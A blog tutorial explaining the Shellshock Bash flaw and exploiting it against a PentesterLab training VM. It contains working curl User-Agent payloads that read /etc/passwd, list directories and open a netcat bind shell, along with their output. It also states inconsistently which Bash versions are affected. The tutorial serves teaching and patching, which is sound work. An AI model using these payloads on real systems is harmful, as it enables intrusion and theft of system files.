Shellshock Explained + Exploitation Tutorial

July 02, 2016 — metalkey

Introduction

Shellshock is a “code injection attack” that takes advantage of a function definition vulnerability in Bash 4.3 and earlier.
The vulnerability is caused by Bash processing trailing strings after function definitions in the values of environment variables. In Bash 4.3 and later, these trailing strings will not be executed.

Testing

To test if your system is vulnerable, simply run the command below in a Bash shell.




user@debian8:~$ env x='() { :;}; echo vulnerable' bash -c "echo not-vulnerable"

If 'vulnerable' is echoed back, your system is vulnerable, since echo vulnerable is directly after the function definition env x='() { :;};
A response of 'not-vulnerable' indicates your system is not vulnerable to the test above.
Note: Additional tests should be performed to confirm your system is not vulnerable to Shellshock.
These tests can be found on the Shellshocker Website - https://shellshocker.net/

Exploitation

Launch the 'Pentester Lab: CVE-2014-6271 Shellshock' VM (https://pentesterlab.com/exercises/cve-2014-6271) then browse to the VM’s IP in your web-browser.
You will be presented with the output of the [uptime] and [uname -a] Linux commands, running on the Pentesterlab VM.

CVE-2014-6271
This system is running:
uptime: 20:44:15 up 0 min, 1 users, load average: 0.06, 0.01, 0.00
kernel: Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux

View the page source and you’ll notice the location of the CGI (http://www.techrepublic.com/article/cgi-crash-course-how-to-run-cgi-scripts/) script that is executed on the server.

$.getJSON("/cgi-bin/status", function (data) {

Let’s use curl to launch a few shellshock attacks against the status CGI script via the User-Agent string (-A in curl).

Passwd File




user@debian8:~$ curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/cat /etc/passwd' http://192.168.1.14/cgi-bin/status > passwd



user@debian8:~$ cat passwd

root:x:0:0:root:/root:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/false

tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh

pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh

Directory Listing




user@debian8:~$ curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls /' http://192.168.1.14/cgi-bin/status

bin

boot

dev

etc

home

init

...

Bind Shell

Bind an instance of Bash to a netcat listener on port 2345 and connect.
After executing the bind shell on the Shellshock VM (/usr/bin/nc -lvvp 2345 -e /bin/bash) you will need to open a new terminal window to connect using (nc -vn 192.168.1.14 2345)




user@debian8:~$ curl -A '() { :; }; /bin/bash -c "/usr/bin/nc -lvvp 2345 -e /bin/bash"' http://192.168.1.14/cgi-bin/status



user@debian8:~$ nc -vn 192.168.1.14 2345

(UNKNOWN) [192.168.1.14] 2345 (?) open



whoami

pentesterlab



/sbin/ifconfig

[eth0]

Link encap:Ethernet HWaddr 08:00:27:84:1F:23

inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: fe80::a00:27ff:fe84:1f23/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:742 errors:0 dropped:0 overruns:0 frame:0

TX packets:426 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:57418 (56.0 KiB) TX bytes:246492 (240.7 KiB)

Interrupt:10 Base address:0xd020

Conclusion

The examples above demonstrate a tiny fraction of what is possible using the Shellshock vulnerability.

Additional attack vectors include:
– OpenSSH server
– DHCP clients
– Qmail server
– IBM HMC restricted shell

If your system is vulnerable, ensure it is patched immediately by upgrading your version of Bash then re-testing.

Tags: shellshock